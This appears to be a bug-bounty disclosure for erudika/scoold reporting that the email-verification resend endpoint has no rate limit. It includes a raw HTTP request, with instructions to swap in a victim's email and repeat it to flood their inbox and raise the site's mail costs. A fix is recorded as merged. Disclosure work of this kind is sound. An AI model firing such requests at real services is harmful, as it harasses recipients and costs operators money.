Insufficient Granularity of Access Control in erudika/scoold

Valid

Reported on

Aug 1st 2021


✍️ Description

Bypass rate limit and sent unlimited email to any email address.

💥 Impact

Attacker can sent unlimited email to any mail address . Many email service provider has limited email sending like 10000 email per month . If you exeed that limit then you will be extra charged . So, using this attack attacker can exeed that limit and company will be charged extra money.

🕵️‍♂️ Proof of Concept

During email verification resending there is not rate limit , which allow attacker to sent unlimited email to any mail address .

  1. First create a account in https://live.scoold.com with any email address . Now sent bellow request to send unlimited verification email
POST /signin/register/resend HTTP/1.1
Host: live.scoold.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://live.scoold.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Origin: https://live.scoold.com
DNT: 1
Connection: close
Cookie: drift_campaign_refresh=6120fffa-1159-4d14-9bb5-eff77e486c0a; drift_aid=fa0512b1-8634-43c6-8abc-7febc322ef3f; driftt_aid=fa0512b1-8634-43c6-8abc-7febc322ef3f; G_ENABLED_IDPS=google
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

email=momosaf219%40aline9.com&leaveblank=&timestamp=1627830473695

Here in this postdata change email parameter value to vicitm email.
Now sent this request unlimited time and victim email address will received unlimited verification email . Also attacker can make this as python code and send unlimited email

You should set rate limit there to prevent this

We have contacted a member of the erudika/scoold team and are waiting to hear back 4 months ago
Alex Bogdanovski validated this vulnerability 4 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alex Bogdanovski confirmed that a fix has been merged on 043be6 4 months ago
Alex Bogdanovski has been awarded the fix bounty